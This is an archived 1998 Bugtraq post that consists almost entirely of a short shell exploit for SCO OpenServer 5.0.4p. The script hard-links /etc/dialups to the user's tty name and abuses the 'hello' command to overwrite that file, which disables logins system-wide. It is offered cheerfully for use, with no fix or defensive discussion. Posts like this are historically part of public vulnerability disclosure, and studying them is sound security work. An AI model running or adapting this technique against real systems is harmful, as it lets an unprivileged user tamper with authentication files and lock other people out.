Bugtraq mailing list archives

Fw: Exploit for SCO.


From: leshka () LESHKA CHUVASHIA SU (Leshka)
Date: Thu, 10 Sep 1998 21:43:29 +0400


#!/bin/sh
#
#                                   Hi !
#             This script is used for login disabling(enabling)
#                (SCO OpenServer Enterprise System v 5.0.4p).
#            If you have any problems with it, drop me a letter.
#                                Have fun !
#
#
#                           ----------------------
#               ---------------------------------------------
#    -----------------   Dedicated to my beautiful lady   ------------------
#               ---------------------------------------------
#                           ----------------------
#
#          Leshka Zakharoff, 1998. E-mail: leshka () leshka chuvashia su
#
#
#999,99
tty=`tty`;ttyfile=`pwd`/`basename $tty`
echo "Press any letter key 240 times (3 lines of text) then <CTRL>-D to
disable"
echo "login or just type <CTRL>-D to login enable. Sorry for the manual
work."
ln /etc/dialups $ttyfile;hello leshka ..$ttyfile;rm -f $ttyfile



Current thread: